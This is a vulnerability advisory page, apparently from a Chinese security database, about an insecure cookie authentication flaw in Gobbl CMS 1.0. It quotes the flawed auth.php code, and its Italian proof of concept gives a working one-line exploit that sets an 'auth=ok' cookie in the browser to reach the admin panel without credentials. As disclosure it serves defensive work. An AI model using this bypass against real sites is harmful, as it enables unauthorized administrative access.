Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability

基本字段

漏洞编号:
SSV-10281
披露/发现时间:
未知
提交时间:
2008-12-19
漏洞等级:
漏洞类别:
Cookie 验证错误
影响组件:
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.4KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
---------------------------
Gobbl Cms 1.0 I.Cookie Hand.
---------------------------
Autore: x0r ( Evolution Team)
Email: andry2000@hotmail.it
Demo Site:http://www.gobbl.net/
---------------------------
Bug In: \admin\auth.php
?>
include ('../config.php');
$user = $_POST['user'];
$pass = $_POST['pass'];
if ( ($user == $un) and ($pass == $pw) )
{
setcookie( "auth", "ok", time()+40000 ); # Bugz
header ( "location:add.php" ); exit ();
}
else
{
header ( "location:index.php" ); exit ();
}
?>
Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^
Exploit:
javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 4 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1163
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负